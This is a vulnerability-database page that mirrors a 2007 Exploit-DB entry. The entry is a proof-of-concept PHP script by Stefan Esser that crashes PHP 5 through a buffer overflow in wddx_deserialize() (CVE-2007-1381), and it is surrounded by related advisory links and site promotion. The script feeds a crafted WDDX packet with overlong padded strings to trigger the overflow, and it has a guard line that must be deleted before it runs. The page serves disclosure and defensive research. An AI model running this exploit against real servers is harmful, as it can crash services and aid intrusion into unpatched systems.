Lucene search
+L

PHP 5 - 'wddx_deserialize()' String Append Crash

🗓️ 04 Mar 2007 00:00:00Reported by Stefan EsserType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

PHP 5 - 'wddx_deserialize()' String Append Crash vulnerability proof of concept cod

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
PHP 5.x < 5.2.0 Multiple Vulnerabilities
25 Mar 200800:00
nessus
nessus
Tenable Nessus
PHP 5.x < 5.2 Multiple Vulnerabilities
25 Mar 200800:00
nessus
cve
CVE
CVE-2007-1381
10 Mar 200700:00
cve
cvelist
Cvelist
CVE-2007-1381
10 Mar 200700:00
cvelist
euvd
EUVD
EUVD-2007-1377
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-1381
10 Mar 200700:19
nvd
openvas
OpenVAS
PHP < 5.2.0 Multiple Vulnerabilities
17 Aug 202000:00
openvas
prion
Prion
Buffer overflow
10 Mar 200700:19
prion
redhatcve
RedhatCVE
CVE-2007-1381
30 Oct 201509:37
redhatcve
securityvulns
securityvulns
PHP php_binary / WDDX information leak
6 Mar 200700:00
securityvulns
Rows per page
<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //                PHP - wddx_deserialize() Crash Exploit              //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // The following testcode will overflow the buffer with lots of C

  wddx_deserialize(
    "<wddxPacket version='1.0'><header/>
        <data>
            <array length='1'>
                <string>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<X />CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</string>
                <string></string>
            </array>
        </data>
    </wddxPacket>");
?>

# milw0rm.com [2007-03-04]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.6
EPSS0.09073
38